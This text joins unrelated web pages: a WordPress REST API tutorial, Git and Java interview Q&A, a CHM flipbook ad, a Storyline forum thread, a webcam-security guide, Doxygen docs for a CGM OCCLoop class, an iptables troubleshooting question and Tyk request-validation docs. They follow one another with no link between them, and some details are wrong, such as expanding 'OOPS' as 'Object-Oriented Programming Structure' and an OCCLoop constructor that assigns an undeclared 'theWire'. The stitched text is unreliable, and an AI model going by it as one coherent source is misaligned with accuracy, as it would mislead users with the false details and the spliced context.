WP Hooks provide methods to interact with REST API endpoints. You can use hooks like wp_remote_get and wp_remote_post to make requests and retrieve data from external sources. This flexibility enables you to integrate third-party services seamlessly.
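A minimal sketch of such a request (the URL is a placeholder):
// Fetch posts from another WordPress site via its REST API.
$response = wp_remote_get( 'https://example.com/wp-json/wp/v2/posts' );

if ( is_wp_error( $response ) ) {
    error_log( $response->get_error_message() ); // request failed
} else {
    $posts = json_decode( wp_remote_retrieve_body( $response ), true );
    // $posts now holds the decoded array of posts returned by the remote site.
}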
What are the some key points of WordPress Rest API ?
Routes & Endpoints
A route is a URL that can be mapped to one or more HTTP methods (GET, POST, etc.), while an endpoint is the connection between an individual HTTP method and a route.
Ex: /wp-json is a route; when that route receives a GET request, the request is handled by the endpoint that displays what is known as the index of the WordPress REST API.
Requests
A request is represented by an instance of the WP_REST_Request class. Using this class we can store and retrieve information about the current request. It is generated automatically whenever an HTTP request is made to a registered API route.
Responses
The data we get back from the API comes as a response. The WP_REST_Response class provides a way to interact with the response data returned by endpoints.
Schema
Schemas are defined in a structured data format. The schema structures API data and provides a comprehensive list of all the properties the API can return and the input parameters it can accept.
Controller Classes
Using a controller class we can manage the registration of routes and endpoints, handle requests, utilize the schema, and generate API responses.
Creating an API by Using plugin
Using a plugin, we can create an API.
• Add WordPress REST API Basic Auth plugin.
• Log in to your WordPress dashboard and go to Plugins -> Add New. Click the Upload Plugin button and select the plugin's zip file, or search for Basic Auth in the search bar, click the Install button, and after installation click Activate to activate the plugin.
• Once Basic Auth is installed, open a CLI and authenticate an API request by using the user flag.
• Ex: curl -X GET --user username:password -i <your curl URL>
Practical Examples and Use Cases
To solidify your understanding, let’s explore practical examples such as creating a custom post endpoint, integrating with popular services like Google Maps, and automating social media sharing using WP Hooks.
Examples
require get_template_directory() . '/myapi/myfile.php';
Suppose you want to create an API; then create a file inside a folder named myapi (included above via the require line) and add the code below to it.
<?php
add_action( 'rest_api_init', function () {
register_rest_route( 'gp', '/listpost', array(
'methods' => 'GET',
'callback' => 'get_blog_data',
'permission_callback' => '__return_true', // public endpoint; WordPress 5.5+ expects this to be set explicitly
) );
} );
function get_blog_data(){
global $post;
$args = array('post_type'=>'post','numberposts' => 5);
$myposts = get_posts( $args );
$dataArray=array();
foreach($myposts as $post){
$arr=array();
$arr['id']=$post->ID;
$arr['post_title']=$post->post_title;
$arr['post_content']=wp_trim_words($post->post_content);
$arr['post_date']=$post->post_date;
$arr['guid']=$post->guid;
$arr['thumbnail']=wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'full' ); // this function expects an attachment ID, not the post ID
$dataArray[]=$arr;
}
return $dataArray;
}
?>
The URL should be: yourhostname/wp-json/gp/listpost (include the subdirectory, e.g. /wp/, if WordPress is installed in one).
Conclusion
The WordPress REST API, combined with the power of WP Hooks, opens up endless possibilities for developers looking to create innovative and feature-rich applications. By following this guide, you’ve gained a solid foundation in utilizing these tools effectively.
Most Useful GIT Q&A Commands: Mastering Version Control
Git, a distributed version control system, has revolutionized the way developers collaborate and manage their codebases. Whether you’re a seasoned developer or just starting on your coding journey, understanding and mastering Git commands is crucial for efficient version control and seamless collaboration. In this article, we’ll explore the most useful GIT Q&A commands that will empower you to navigate the world of version control like a pro.
What is GIT Repository ?
A Repository is a file structure where git stores all the project based files. Git can either stores the files on the local or the remote repository.
What does Git Clone do ?
This command creates a copy (or clone) of an existing Git repository. It is generally used to get a copy of a remote repository into a local repository.
Example: git clone <repository_url>
What does the command git config do ?
The git config Command is a convenient way to set configuration options for defining the behavior of the repository, User information and preferences, git installation-based configurations, and many such things.
Ex : To setup your name and email address before using git commands, we can run the below commands.
git config --global user.name "<<your_name>>"
git config --global user.email "<<your_email>>"
What is conflict & how you will solve this ?
Git usually handles feature merges automatically, but sometimes while working in a team environment there might be cases of conflicts such as:
1. When two separate branches have changes to the same line in a file.
2. A file is deleted in one branch but has been modified in the other.
These conflicts have to be solved manually after discussion with the team as git will not be able to predict what and whose changes have to be given precedence.
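As a rough illustration of that manual workflow (the branch and file names are placeholders):
git merge feature-branch     # merge stops and reports a conflict in app.txt
git status                   # lists the conflicted file(s)
# open app.txt, remove the <<<<<<< / ======= / >>>>>>> markers and keep the agreed lines
git add app.txt              # mark the conflict as resolved
git commit                   # complete the merge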
What is the functionality of git ls-tree ?
This command returns a tree object representation of the current repository along with the mode and the name of each item and SHA-1 value of the blob.
What does git status command do ?
The git status command shows the difference between the working directory and the index, which is helpful for understanding Git in depth and also keeps track of tracked and untracked changes.
Define “Index” ?
Before committing changes, the developer is given the provision to format, review, and revise the files. All of this is done in a common area known as the 'Index' or 'Staging Area'.
The 'staged' status indicates the staging area and provides an opportunity to evaluate changes before committing them.
What does git add command do ?
• This command adds files and changes to the index of the existing directory.
• You can add all changes at once using the git add . command.
• You can add files one by one using the git add <filename> command.
• You can add the contents of a particular folder using the git add <folder_name>/ command.
How you will create a git Repository ?
• Have git installed in your system.
• In order to create a git repository, create a folder for the project and then run git init .
• This will create a .git folder in the project directory, which indicates that the repository has been created.
What is git Stash ?
Git stash can be used in cases where we need to switch between branches without losing the edits in the current branch. Running the git stash command saves the current uncommitted changes onto a stack and leaves a clean working directory, so we can move on to other tasks.
What is the command used to delete a branch ?
• To delete a branch we can simply use the command git branch -d <branch_name>.
• To delete a branch locally, we can simply run the command: git branch -d <local_branch_name>
• To delete a branch remotely, run the command: git push origin --delete <remote_branch_name>
• A branch-deletion scenario occurs for multiple reasons. One such reason is to get rid of a feature branch once it has been merged into the development branch.
What are difference between Command git remote and git clone ?
The git remote command creates an entry in the Git config that specifies a name for a particular URL, whereas git clone creates a new Git repository by copying an existing one located at the URL.
What is git Stash apply Command do ?
• git stash apply command is used for bringing the work back to the working directory from the stack where the changes were stashed using git stash command.
• This helps developers resume their work where they last left off before switching to other branches.
How git pull & git merge is connected to each other ?
git pull = git fetch + git merge
What is difference between Pull request & branch ?
Pull Request
This process is done when there is a need to put a developer’s change into another person’s code branch.
Branch
A branch is nothing but a separate version of the code.
Why do we not call git “pull request” as “push request” ?
A 'push request' would mean that the target repository is asking us to push our changes to it, which is not what happens.
It is called a pull request because we are requesting that the target repository grab (or pull) the changes from our branch or fork.
What is commit object ?
A commit object consists of the following components :
a : A set of files that represents the state of a project at a given point in time.
b : Reference to parent commit objects.
c : A 40 character String termed as SHA-1 name uniquely identifies the commit object.
What command helps us know the list of branches merged to master ?
git branch --merged helps to get the list of the branches that have been merged into the current branch.
Note : git branch --no-merged lists the branches that have not been merged into the current branch.
What are the functionalities of git reset --mixed and git merge --abort ?
The git reset --mixed command is used to undo changes in the index (staging area) while keeping the changes in the working directory.
The git merge --abort command is used for stopping the merge process and returning back to the state before the merging occurred.
Conclusion
Congratulations! You’ve taken a significant step towards mastering Git. By understanding and utilizing these essential Git Q&A commands, you’ve equipped yourself with the tools to navigate version control confidently and collaborate seamlessly with fellow developers.
Most Common Programing Language Q&A asked in Interviews !
In today’s competitive job market, landing a programming job requires more than just technical skills. Interviewers often delve into the depths of programming languages to assess a candidate’s expertise. Whether you’re a seasoned developer or a fresh graduate, having a solid grasp of the most common programming language questions and answers can give you an edge. In this article, we’ll explore the frequently asked programming language questions in interviews and provide comprehensive answers to help you ace your next interview.
As the tech industry continues to evolve, programming languages remain at the core of software development. Interviews are a critical juncture where employers assess candidates’ abilities to solve problems, write efficient code, and communicate effectively. Let’s delve into the significance of programming language questions in interviews and explore some of the most commonly asked questions.
Importance of Programming Language Questions in Interviews
In interviews, programming language questions serve multiple purposes. They assess your technical prowess, problem-solving skills, and familiarity with industry-standard languages. Moreover, they offer insight into your approach to coding challenges and your ability to adapt to different programming paradigms.
Write a Program to Reverse a String ?
A sample program is shown below.
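For reference, a minimal Java sketch of one common approach (class and variable names are arbitrary):
public class ReverseString {
    public static void main(String[] args) {
        String input = "greens";                       // sample input
        String reversed = new StringBuilder(input).reverse().toString();
        System.out.println(reversed);                  // prints "sneerg"
    }
}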
What is meant by OOPS ?
OOPS stands for Object-Oriented Programming Structure. It is a method of implementation in which programs are organized as collections of objects, classes, and methods.
What is meant by Class, Method & Object ?
Class
A class is a collection of objects and methods. A class contains attributes (variables and methods) that are common to all the objects created from it.
Method
A method defines the set of actions to be performed.
Object
An object is the runtime memory allocation. Using an object we can call any of the methods.
What is meant by Encapsulation ?
Encapsulation wraps the data and the code acting on that data together into a single unit, much like a folder groups related files.
Ex: a POJO class is an example of encapsulation. It is otherwise called data hiding.
What is the main use of Scanner class ?
To get the inputs from the user at the run time.
What are the methods available in Scanner Class ?
• nextByte();
• nextShort();
• nextInt();
• nextLong();
• nextFloat();
• nextDouble();
• next().charAt(0);
• next();
• nextLine();
• nextBoolean();
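A short illustrative sketch using a few of these methods (variable names are arbitrary):
import java.util.Scanner;

public class ScannerDemo {
    public static void main(String[] args) {
        Scanner sc = new Scanner(System.in);
        String name = sc.nextLine();          // reads a whole line of text
        int age = sc.nextInt();               // reads an integer
        double price = sc.nextDouble();       // reads a double
        char grade = sc.next().charAt(0);     // reads the first character of the next token
        System.out.println(name + " " + age + " " + price + " " + grade);
        sc.close();
    }
}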
What is Method overloading and overriding ?
Method overriding is used to provide a specific implementation of a method that is already provided by its superclass. Method overloading is performed within a class, while method overriding occurs between two classes that have an IS-A (inheritance) relationship. In the case of method overloading, the parameters must be different.
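A tiny Java sketch of the difference (class names are arbitrary):
class Shape {
    void draw() { System.out.println("drawing a shape"); }
    // Overloading: same method name, different parameters, same class
    void draw(String color) { System.out.println("drawing in " + color); }
}

class Circle extends Shape {
    // Overriding: same signature, subclass (IS-A relationship) supplies its own implementation
    @Override
    void draw() { System.out.println("drawing a circle"); }
}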
What is meant by polymorphism ?
Poly means many and morphism means forms. Taking more than one form is called polymorphism; in other words, one task implemented in many ways.
What is meant by inheritance ?
Inheritance means accessing one class's properties in another class without creating multiple objects. It avoids wasting time and memory and ensures code reusability.
What are the ways to access the methods /data from another class ?
We can access another class's methods either by creating an object of that class or by using the extends keyword.
What is meant by access specifier ?
It defines the scope or level of access for variables, methods and classes.
What are the difference between public and protected ?
Public: global-level access (same package + different package).
Protected: accessible inside the same package (object creation + extends) and outside the package only through inheritance (extends).
What is meant by Abstraction ?
Hiding the implementation part or business logic is called abstraction.
What are the types of Abstraction ?
• Partial abstraction (using an abstract class).
• Full abstraction (using an interface).
Can we create Object for Abstract class ?
No, we can't create an object of an abstract class.
What is meant by Interface ?
An interface supports only abstract methods (without business logic); it does not support non-abstract methods (methods with business logic).
In an interface, "public abstract" is the default for methods.
Using the implements keyword we can implement the interface in a class, where we write the business logic for all the unimplemented methods.
What are the difference between Abstract and Interface ?
Abstract class: Using an abstract class, we can achieve partial abstraction.
• It supports both abstract and non-abstract methods.
• Using the extends keyword you can inherit an abstract class.
• For any abstract method we need to mention the abstract modifier explicitly.
Interface: Using an interface, we can achieve full abstraction.
• It supports only abstract methods.
• It is used with the implements keyword.
• "public abstract" is the default, so there is no need to mention it explicitly.
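An illustrative Java sketch of both (names are arbitrary):
abstract class Vehicle {                                   // partial abstraction
    abstract void start();                                 // abstract method
    void fuel() { System.out.println("refuelling"); }      // non-abstract method is allowed here
}

interface Drivable {                                       // full abstraction
    void drive();                                          // implicitly public abstract
}

class Car extends Vehicle implements Drivable {
    void start() { System.out.println("car started"); }
    public void drive() { System.out.println("car driving"); }
}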
What is meant by String ?
• A collection of characters or words enclosed within double quotes is called a String.
• String is a class in Java.
• String is index-based.
• Example: "greenstechnology".
Can you create page-turning eBooks based on compact CHM pages?
CHM documents are always compact; how can I show these compact pages with a more stunning Flash effect?
To show your CHM pages with a stunning page-flipping effect, Flip CHM could be the best choice.
The operations are very easy:
1. Click "Import CHM" button, choose your CHM file, you can check the options like "Import links", "Import bookmark" and "Enable Search" in the import interface;
2. In the main template setting interface, you can choose template, define book properties, sound, toolbar and links, click "Apply Change" after all settings;
3. Click "Convert To Flipping Book" to choose output format from HTML, ZIP and EXE, you can also burn the created flipbook to CD/DVD.
Download the free trial version to have a try first.
More questions about Flip CHM
On screen buttons disappear
I'm working on a course and we have a custom GUI so are not using the Storyline Player. Instead, we have our own Next and Back buttons. They aren't anything fancy - just a graphic button with a hover state and they go to the next or previous slide.
We had the buttons at the Master slide level and were finding that they would disappear when revisiting some slides. I change some settings and moved the buttons to each individual page rather than the master, but it is still happening. Sometimes it's fine, and other times one of the buttons doesn't display when we revisit the page. Has anyone else had this issue and found a solution?
16 Replies
Ashley Terwilliger
Hi Kelley,
Are there triggers set to hide the buttons or change their state based on slide conditions or based on the user answering the question? Are they navigated to a layer after answering, and maybe the buttons are hidden on the layer?
Without seeing what you've got set up, it's hard to know for certain what elements are contributing to this behavior. Are you able to share your .story file here with us to take a look at?
Kelley Conrad
I'd have to ask the client if it would be okay to share it.
To answer your questions, the buttons are not hidden on the layer and it happens inconsistently. I can go back once and the back button is gone, then I can go back again and the back button is there but the next button is gone. Sometimes both disappear, sometimes both are there. The only condition associated with the buttons is to not have them jump to the next page or show the hover state if they are in a disabled state.
Kelley Conrad
No - they are all set to show until the end of the timeline. They were initially on the master slide and set to show until the end of the slide with no fades. They work perfectly on most slides but not all the time. I took them off the master slide and put them on each slide individually, but it still happens intermittently unless I set the slides where there is an issue to Reset to Initial. It seems to only happen on the slides where there are layers, a question, etc, but it doesn't happen on all of them and it doesn't happen the same way every time. I have attached a PDF with some screen shots. I had to remove all of the client info, but it should give an idea of what happens,
Stephanie Harnett
Have you tried removing the triggers that are controlling states and leaving just triggers that control navigation for those buttons? The states should automatically occur without additional trigger logic. If you have and are still having problems, if you upload a sample containing just 2 slides, I can take a quick peek at it.
Stephanie Harnett
Here's an example that seems to work. The first slide has a radio button and the next button is disabled (grey). When you click the radio button the next button changes to selected (orange). Clicking it takes you to slide 2. Same deal here. Clicking back shows the button correct in the correct state and moving ahead the buttons work on slide 2.
Kelley Conrad
Here's the file with a few pages. If I set the pages to Reset to Initial, it resolves the problem. I didn't set up the custom GUI so I don't have all of the graphic elements/states as .png files to play around with. I removed the audio and the content pages are blank, but you can see the buttons appear and disappear, especially on the slide with the layers, when you go back and forth.
Stephanie Harnett
Hi Kelley. I removed all of the unnecessary triggers (those controlling the various states). I added a default state of hover (instead of custom over state) to each button. I set all slides to resume saved state instead of reset. I added a blank slide at the end so you can see that when the (page 30) slide comes up with the disable next button, that the state doesn't change and the user can't move forward without the need for triggers to control that - it's built into the disabled state, just like hover is built into the hover state.
You’re sitting only inches away from a potentially huge vulnerability. Your computer’s webcam could create an opening for a hacker to gain access and learn compromising information.
Download the FREE Webcam Security Guide below!
Why do hackers want to spy on you?
The most common way for hackers to take control of your webcam and spy on you is through malware, which is inadvertently downloaded through links or emails that you click on. The hacker’s goal is to spy on your behavior and learn information they can use to make money.
One way they can do this is by capturing sensitive photos and using them to blackmail you, which is getting more and more possible as video quality is always improving. Hackers can also watch you to learn about your identity, financial information, or habits, which can then be sold or used to steal your identity. Finally, gaining access to your webcam can also give hackers an opportunity to infect your computer with more malware or viruses.
It’s just a camera. Is it really that vulnerable?
YES! In our post-pandemic world, many vulnerable webcams today are in residences, which hackers can easily get into through smart home networks. Today’s Internet of Things (IoT) brings devices together on the same network, making life much more convenient, but also opening individuals and families up to big risks.
Through a vulnerability in your computer, your internet connection, or even your own actions, hackers can easily gain access. Do you remember the recent Ring doorbell incidents?
So how do you protect yourself?
While the threat is very real, it’s not hard to set up security measures that will protect you, your information, and your family (or business!). It’s important to recognize how a hacker can gain access. Just like in a building, there are multiple points of entry, or weaknesses, the hacker can try to exploit.
Your Computer
It’s very important to secure your physical computer with these simple steps:
1. Keep all software up to date so vulnerabilities are patched and each program has their latest cybersecurity measures.
2. Use a firewall (network security system) on your computer. Most modern computers have one built in.
3. Pay for security software like McAfee or Avast. Be wary of off-brand security software, though!
4. Cover your webcam with tape or a webcam cover as a safeguard in case you’re ever hacked.
Your Internet / WiFi
1. Secure your WiFi by creating a name and a UNIQUE password – don’t reuse passwords! Hackers love it when you do this.
2. Use a VPN (virtual private network) in addition to your other security controls. Some security software (like those above) will do this for you.
Your Actions
The next potential point of entry is YOU! You could be a vulnerability by clicking on a seemingly harmless link or downloading something unknown. Staying skeptical is your best defense against hacking and malware.
1. Use different passwords for all websites and update them frequently.
2. Don’t chat with strangers online or provide login info to people you don’t know.
3. Don’t click on odd-looking links and don’t ever download something unless you know exactly what it is or it came from a trusted, verified source.
4. Don’t allow strangers access to your computer (even for repairs) unless they’re fully vetted and reputable.
Some of these take two seconds and some are important habits to develop. Following these TCecure tips will protect you against potential threats across all your home devices.
If you feel you’ve been the victim of a webcam hack, change your passwords, follow the above steps, and run a security scan on your computer to remove the malware.
Get the FREE Webcam Security Guide below! Email us for cybersecurity assistance: [email protected]!
Sources: Norton, Avast
cgma
OCCLoop Class Reference
#include <OCCLoop.hpp>
Inheritance diagram for OCCLoop:
LoopSM TopologyBridge
List of all members.
Public Member Functions
OCCLoop (TopoDS_Wire *theLoop)
void coedges (DLIList< OCCCoEdge * > coedges)
DLIList< OCCCoEdge * > coedges ()
OCCCoEdgeremove_coedge (OCCCoEdge *coedge)
void disconnect_all_curves ()
TopoDS_Wire * get_TopoDS_Wire ()
void set_TopoDS_Wire (TopoDS_Wire loop)
virtual LoopType loop_type ()
virtual ~OCCLoop ()
virtual CubitBox bounding_box () const
virtual GeometryQueryEngineget_geometry_query_engine () const
virtual void append_simple_attribute_virt (const CubitSimpleAttrib &)
virtual void remove_simple_attribute_virt (const CubitSimpleAttrib &)
virtual void remove_all_simple_attribute_virt ()
virtual CubitStatus get_simple_attribute (DLIList< CubitSimpleAttrib > &)
virtual CubitStatus get_simple_attribute (const CubitString &name, DLIList< CubitSimpleAttrib > &)
virtual void get_parents_virt (DLIList< TopologyBridge * > &)
virtual void get_children_virt (DLIList< TopologyBridge * > &)
CubitStatus update_OCC_entity (BRepBuilderAPI_ModifyShape *aBRepTrsf, BRepAlgoAPI_BooleanOperation *op=NULL)
Static Public Member Functions
static CubitStatus update_OCC_entity (TopoDS_Wire &old_loop, LocOpe_SplitShape *sp)
Private Attributes
TopoDS_Wire * myTopoDSWire
DLIList< OCCCoEdge * > myCoEdgeList
Detailed Description
Definition at line 37 of file OCCLoop.hpp.
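A purely illustrative usage sketch (not taken from the CGM sources; it assumes a valid TopoDS_Wire named existing_wire is available from elsewhere in the model):
// Wrap an OpenCASCADE wire in a CGM loop and query it.
TopoDS_Wire* wire = new TopoDS_Wire(existing_wire);
OCCLoop* loop = new OCCLoop(wire);

CubitBox box = loop->bounding_box();             // union of the attached coedge curves' boxes
DLIList<OCCCoEdge*> coedge_list = loop->coedges();

delete loop;                                     // the destructor nullifies and frees the wire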
Constructor & Destructor Documentation
OCCLoop::OCCLoop ( TopoDS_Wire * theLoop)
Definition at line 55 of file OCCLoop.cpp.
{
myTopoDSWire = theWire;
}
OCCLoop::~OCCLoop ( ) [virtual]
Definition at line 66 of file OCCLoop.cpp.
{
disconnect_all_curves();
if (myTopoDSWire)
{
myTopoDSWire->Nullify();
delete (TopoDS_Wire*)myTopoDSWire;
myTopoDSWire = NULL;
}
}
Member Function Documentation
void OCCLoop::append_simple_attribute_virt ( const CubitSimpleAttrib & ) [virtual]
Implements TopologyBridge.
Definition at line 139 of file OCCLoop.cpp.
{
}
CubitBox OCCLoop::bounding_box ( void ) const [virtual]
Definition at line 225 of file OCCLoop.cpp.
{
CubitBox box;
for (int i = myCoEdgeList.size(); i > 0; i--)
{
DLIList<OCCCoEdge*> coedges = myCoEdgeList;
OCCCoEdge* coedge = coedges.get_and_step();
box |= coedge->curve()->bounding_box();
}
return box;
}
void OCCLoop::coedges ( DLIList< OCCCoEdge * > coedges) [inline]
Definition at line 43 of file OCCLoop.hpp.
DLIList< OCCCoEdge * > OCCLoop::coedges ( ) [inline]
Definition at line 45 of file OCCLoop.hpp.
{return myCoEdgeList;}
void OCCLoop::disconnect_all_curves ( )
Definition at line 118 of file OCCLoop.cpp.
void OCCLoop::get_children_virt ( DLIList< TopologyBridge * > & children) [virtual]
Implements TopologyBridge.
Definition at line 214 of file OCCLoop.cpp.
GeometryQueryEngine * OCCLoop::get_geometry_query_engine ( ) const [virtual]
Implements TopologyBridge.
Definition at line 243 of file OCCLoop.cpp.
void OCCLoop::get_parents_virt ( DLIList< TopologyBridge * > & parents) [virtual]
Implements TopologyBridge.
Definition at line 185 of file OCCLoop.cpp.
{
OCCQueryEngine* oqe = (OCCQueryEngine*) get_geometry_query_engine();
OCCSurface * surf = NULL;
DLIList <OCCSurface* > *surfs = oqe->SurfaceList;
TopTools_IndexedDataMapOfShapeListOfShape M;
for(int i = 0; i < surfs->size(); i++)
{
surf = surfs->get_and_step();
TopExp::MapShapesAndAncestors(*(surf->get_TopoDS_Face()),
TopAbs_WIRE, TopAbs_FACE, M);
if (!M.Contains(*(get_TopoDS_Wire())))
continue;
const TopTools_ListOfShape& ListOfShapes =
M.FindFromKey(*(get_TopoDS_Wire()));
if (!ListOfShapes.IsEmpty())
{
TopTools_ListIteratorOfListOfShape it(ListOfShapes) ;
for (;it.More(); it.Next())
{
TopoDS_Face Face = TopoDS::Face(it.Value());
int k = oqe->OCCMap->Find(Face);
parents.append_unique((OCCSurface*)(oqe->OccToCGM->find(k))->second);
}
}
}
}
CubitStatus OCCLoop::get_simple_attribute ( DLIList< CubitSimpleAttrib > & ) [virtual]
Implements TopologyBridge.
Definition at line 176 of file OCCLoop.cpp.
{
return CUBIT_FAILURE;
}
CubitStatus OCCLoop::get_simple_attribute ( const CubitString & name, DLIList< CubitSimpleAttrib > & ) [virtual]
Implements TopologyBridge.
Definition at line 181 of file OCCLoop.cpp.
{ return CUBIT_FAILURE; }
TopoDS_Wire* OCCLoop::get_TopoDS_Wire ( ) [inline]
Definition at line 51 of file OCCLoop.hpp.
{return myTopoDSWire;}
virtual LoopType OCCLoop::loop_type ( ) [inline, virtual]
Implements LoopSM.
Definition at line 54 of file OCCLoop.hpp.
{return LOOP_TYPE_UNKNOWN;};
void OCCLoop::remove_all_simple_attribute_virt ( ) [virtual]
Implements TopologyBridge.
Definition at line 164 of file OCCLoop.cpp.
{
}
OCCCoEdge * OCCLoop::remove_coedge ( OCCCoEdge * coedge )
Definition at line 123 of file OCCLoop.cpp.
{
if(myCoEdgeList.remove(coedge))
return coedge;
return NULL;
}
void OCCLoop::remove_simple_attribute_virt ( const CubitSimpleAttrib & ) [virtual]
Implements TopologyBridge.
Definition at line 151 of file OCCLoop.cpp.
{
}
void OCCLoop::set_TopoDS_Wire ( TopoDS_Wire loop)
Definition at line 77 of file OCCLoop.cpp.
{
if(myTopoDSWire && loop.IsEqual(*myTopoDSWire))
return;
if(myTopoDSWire && !loop.IsSame(*myTopoDSWire))
{
DLIList<OCCCoEdge*> coedges = this->coedges();
for(int i = 0; i < coedges.size(); i++)
{
OCCCoEdge* coedge = coedges.get_and_step();
OCCCurve* curve = CAST_TO(coedge->curve(), OCCCurve);
TopoDS_Edge *edge = curve->get_TopoDS_Edge( );
BRepTools_WireExplorer Ex;
CubitBoolean found = false;
for (Ex.Init(loop); Ex.More(); Ex.Next())
{
TopoDS_Shape crv = Ex.Current();
if(edge->IsPartner(crv))
{
found = true;
break;
}
}
if (!found)
curve->remove_loop(this);
}
}
TopoDS_Wire* the_wire = new TopoDS_Wire(loop);
if(myTopoDSWire)
delete (TopoDS_Wire*)myTopoDSWire;
myTopoDSWire = the_wire;
}
CubitStatus OCCLoop::update_OCC_entity ( BRepBuilderAPI_ModifyShape * aBRepTrsf,
BRepAlgoAPI_BooleanOperation * op = NULL
)
Definition at line 254 of file OCCLoop.cpp.
{
assert(aBRepTrsf != NULL || op != NULL);
TopoDS_Shape shape;
CubitBoolean need_update = CUBIT_TRUE;
BRepBuilderAPI_Transform* pTrsf = NULL;
BRepBuilderAPI_GTransform* gTrsf = NULL;
if(aBRepTrsf)
{
pTrsf = (BRepBuilderAPI_Transform*)aBRepTrsf;
shape = pTrsf->ModifiedShape(*get_TopoDS_Wire());
if(shape.IsNull())
{
gTrsf = (BRepBuilderAPI_GTransform*)aBRepTrsf;
shape = gTrsf->ModifiedShape(*get_TopoDS_Wire());
}
}
else
{
TopTools_ListOfShape shapes;
shapes.Assign(op->Modified(*get_TopoDS_Wire()));
if(shapes.Extent() == 0)
shapes.Assign(op->Generated(*get_TopoDS_Wire()));
if(shapes.Extent())
shape = shapes.First();
else if (op->IsDeleted(*get_TopoDS_Wire()))
;
else
need_update = CUBIT_FALSE;
}
//set the curves
for (int i = 1; i <= myCoEdgeList.size(); i++)
{
OCCCurve *curve = CAST_TO(myCoEdgeList.get_and_step()->curve(), OCCCurve);
curve->update_OCC_entity(aBRepTrsf, op);
}
TopoDS_Wire loop;
if (need_update)
{
loop = TopoDS::Wire(shape);
OCCQueryEngine::instance()->update_OCC_map(*myTopoDSWire, loop);
}
return CUBIT_SUCCESS;
}
CubitStatus OCCLoop::update_OCC_entity ( TopoDS_Wire & old_loop,
LocOpe_SplitShape * sp
) [static]
Definition at line 307 of file OCCLoop.cpp.
{
TopTools_ListOfShape shapes;
shapes.Assign(sp->DescendantShapes(old_loop));
assert(shapes.Extent() == 1);
TopoDS_Shape new_loop = shapes.First();
TopoDS_Shape shape_edge;
//set curves
BRepTools_WireExplorer Ex;
for(Ex.Init(old_loop); Ex.More();Ex.Next())
{
TopoDS_Edge edge = Ex.Current();
shapes.Assign(sp->DescendantShapes(edge));
if(shapes.Extent() > 1)
{
shape_edge = shapes.First();
OCCQueryEngine::instance()->update_OCC_map(edge, shape_edge);
}
}
OCCQueryEngine::instance()->update_OCC_map(old_loop , new_loop );
return CUBIT_SUCCESS;
}
Member Data Documentation
Definition at line 122 of file OCCLoop.hpp.
TopoDS_Wire* OCCLoop::myTopoDSWire [private]
Definition at line 121 of file OCCLoop.hpp.
The documentation for this class was generated from the following files:
By: Aranir
[Ubuntu]: Can't open any port
October 23, 2014 4k views
I followed the following guide:
https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-using-ip-tables-on-ubuntu-12-04
and tried to open port 80, but I still have nothing open or listening:
netstat -plunt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1051/mysqld
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 965/sshd
tcp6 0 0 :::22
The strangest thing is that I could connect to the server yesterday and today it isn't working anymore and the only thing I changed was to add a DNS entry on Digital Ocean.
Could this have anything to do with it?
I tried even to disable any protection with the following commands:
$ sudo iptables -X
$ sudo iptables -t nat -F
$ sudo iptables -t nat -X
$ sudo iptables -t mangle -F
$ sudo iptables -t mangle -X
$ sudo iptables -P INPUT ACCEPT
$ sudo iptables -P FORWARD ACCEPT
$ sudo iptables -P OUTPUT ACCEPT
but still only port 22 is accessible. What could be the reason for this?
2 comments
• Why have a firewall in the first place?
Your running daemons could still get exploited?
Make sure you know what you have running and on what ports. Secure those daemons which would be much better then implementing a firewall to allow traffic only to certain ports which are in essence the only ports that are actually being used anyway!
• netstat -plunt will only list ports that something is actively listening on. Do you have a web server listening on port 80? Is Apache or Nginx installed?
1 Answer
netstat -plunt should show you that the web server is trying to listen on port 80 even if it is blocked by the firewall. Make sure the server is running. If it's Apache, run:
service apache2 start
If it's Nginx, then:
service nginx restart
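Once a web server is installed and running, you can verify that something is now listening on port 80 (commands are illustrative):
sudo netstat -plunt | grep :80    # the web server process should appear here
curl -I http://localhost          # should return HTTP response headers from the server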
Request Validation
Introduction
Tyk can protect any Gateway incoming request by validating the request parameters and payload against a schema provided for that path’s request body in the OAS API Definition.
The clever part is that in this schema you can reference another schema defined elsewhere in the API Definition; this lets you write complex validations very efficiently since you don’t need to re-define the validation for a particular object every time you wish to refer to it.
Note
At this time Tyk only supports local references to schema within the same API Definition, but in future we aim to support schemas defined externally (via URL).
How it works
Request Validation works on operations. To enable request validations for the parameters, you must declare at least one parameter on an Open API operation:
"/pet/{petId}": {
"get": {
"summary": "Find pet by ID",
"operationId": "getPetById",
"parameters": [
{
"name": "petId",
"in": "path",
"description": "ID of pet to return",
"required": true,
"schema": {
"type": "integer",
"format": "int64"
}
}
],
...
}
}
If at least one parameter is declared for the operation, Tyk will validate the request parameters against it.
To configure Request Validation, which will check the body of each API request sent to the endpoint, follow these simple steps:
1. Define a schema for an application/json content type in the requestBody section of a path.
{
...
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existent pet in the store",
"content":{
"application/json":{
"schema":{
"type": "string"
}
}
}
}
}
}
}
...
}
1. Enable validateRequest middleware within the operations section of the API definition, using the operationId to identify the specific endpoint for which validation is to be applied.
{
...
"paths":{
"/pet":{
"put":{
...
"operationId": "petput",
"requestBody":{
...
"content":{
"application/json":{
"schema":{
"type": "string"
}
}
}
}
}
}
}
...
"x-tyk-api-gateway": {
...
"middleware": {
...
"operations": {
...
"petput": {
"validateRequest": {
"enabled": true
}
}
}
}
}
}
Using references to access shared schemas
You can define the validation schema directly within the requestBody of the path’s definition, or you can define it in the separate components.schemas section and include a relative reference within the requestBody. This allows you to re-use a schema across multiple paths.
//SCHEMA DEFINED WITHIN PATH DEFINITION
{
...
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existing pet in the store",
"content":{
"application/json":{
"schema":{
"type": "string"
}
}
}
}
}
}
}
...
}
//SCHEMA DEFINED WITHIN COMPONENTS.SCHEMAS AND ACCESSED USING RELATIVE REFERENCE
{
...
"components": {
"schemas": {
"Pet": {
"type": "string"
}
}
},
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existing pet in the store",
"content":{
"application/json":{
"schema":{
"$ref": "#/components/schemas/Pet"
}
}
}
}
}
}
}
...
}
Automatically enable request validation
